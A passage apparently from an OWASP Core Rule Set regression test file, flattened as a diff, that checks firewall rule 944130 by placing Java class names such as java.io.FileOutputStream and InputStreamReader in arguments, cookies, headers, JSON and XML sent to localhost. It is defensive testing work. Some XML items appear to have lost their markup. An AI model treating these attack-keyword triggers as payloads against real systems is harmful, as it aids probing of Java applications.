"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-110 + desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-111 + desc: "Argument test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-112 + desc: "Argument name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-113 + desc: "Cookie test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-114 
+ desc: "Cookie name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-115 + desc: "Request header test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-116 + desc: "XML attribute value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-117 + desc: "XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-118 + desc: "Nested XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-119 + desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-120 + desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-121 + desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-122 + desc: "Argument test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-123 + desc: "Argument name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-124 + desc: "Cookie test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-125 + desc: "Cookie name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-126 + desc: "Request header test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-127 + desc: "XML attribute value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-128 + desc: "XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-129 + desc: "Nested XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-130 + desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + 
log_contains: "id \"944130\"" + - test_title: 944130-131 + desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-132 + desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-133 + desc: "Argument test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-134 + desc: "Argument name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-135 + desc: "Cookie test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-136 + desc: "Cookie name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-137 + desc: "Request header test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-138 + desc: "XML attribute value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-139 + desc: "XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-140 + desc: "Nested XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-141 + desc: "Content-Type text/plain includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-142 + desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-143 + desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-144 + desc: "Argument test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-145 + desc: "Argument name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-146 + desc: "Cookie test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-147 + desc: "Cookie name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-148 + desc: "Request header test 
includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-149 + desc: "XML attribute value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-150 + desc: "XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-151 + desc: "Nested XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-152 + desc: "Content-Type text/plain includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-153 + desc: "Content-Type application/json arg value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-154 + desc: "Content-Type application/json arg name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-155 + desc: "Argument 
test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-156 + desc: "Argument name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-157 + desc: "Cookie test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-158 + desc: "Cookie name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-159 + desc: "Request header test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-160 + desc: "XML attribute value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-161 + desc: "XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
